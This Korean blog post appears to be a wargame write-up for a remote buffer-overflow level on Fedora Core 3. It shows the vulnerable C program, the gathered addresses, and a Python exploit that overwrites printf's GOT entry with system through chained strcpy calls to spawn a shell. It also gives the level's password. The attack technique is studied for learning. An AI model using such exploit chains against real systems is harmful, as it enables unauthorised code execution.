0x02 Study :)/Pwnable

[FC3] Level 5. evil_wizard → dark_stone

eli_ez3r 2018. 8. 10. 11:07


keyword : POP POP RET / Remote

	The Lord of the BOF : The Fellowship of the BOF
	- dark_stone
	- Remote BOF on Fedora Core 3
	- hint : GOT overwriting again
	- port : TCP 8888
#include <stdio.h>

// magic potion for you
from socket import *
void pop_pop_ret(void)
	asm("pop %eax");
	asm("pop %eax");

int main()
	char buffer[256];
	char saved_sfp[4];
	int length;
	char temp[1024];

	printf("dark_stone : how fresh meat you are!\n");
	printf("you : ");

	// give me a food
	fgets(temp, 1024, stdin);

	// for disturbance RET sleding
	length = strlen(temp);

	// save sfp
	memcpy(saved_sfp, buffer+264, 4);

	// overflow!!
	strcpy(buffer, temp);

	// restore sfp
	memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

	// buffer cleaning
	memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

	printf("%s\n", buffer);

hell_fire문제와 evil_wizard가 합쳐진 문제같다. 그런데 stdin임시 버퍼영역이 0으로 초기화된다.

하지만 문제에서 stdin 임시버퍼 영역을 사용하지 않아도 될 것 같다.

이전 문제들 처럼 다음 주소들을 구해오자.

strcpy@plt : 0x08048438

printf@plt : 0x08048408

printf@got : 0x0804984c

binsh : 0x833603

system : 0x7507c0

ppr : 0x80484f3

from socket import *
import struct

def interactive(s):
	while True:
		cmd = raw_input("# ")
		s.send(cmd + "\n")
		print s.recv(4096),

p32 = lambda x : struct.pack("<I", x)

host = 'localhost'
port = 8888

strcpy_plt = 0x08048438
ppr = 0x80484f3
printf_plt = 0x08048408
printf_got = 0x0804984c
system_addr = [0x80484d0, 0x804817c, 0x80482b4, 0x8048138]
binsh = 0x833603

payload  = "A"*264	# dummy
payload += "B"*4	# sfp

for x in range(4):
	payload += p32(strcpy_plt)
	payload += p32(ppr)
	payload += p32(printf_got+(x))
	payload += p32(system_addr[x])

payload += p32(printf_plt)
payload += "C"*4
payload += p32(binsh)

s = socket(AF_INET, SOCK_STREAM)
s.connect( (host, port) )
s.sendall(payload + "\n")
print s.recv(1024)



dark_stone / let there be light


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잘못 된 개념을 서술하였거나, 잘못 풀이된 내용이 있으면 댓글 달아주시면 감사합니다 :)

태클 댓글이나 메일(513.eunice@gmail.com) 환영입니다 !! 😊☺️👍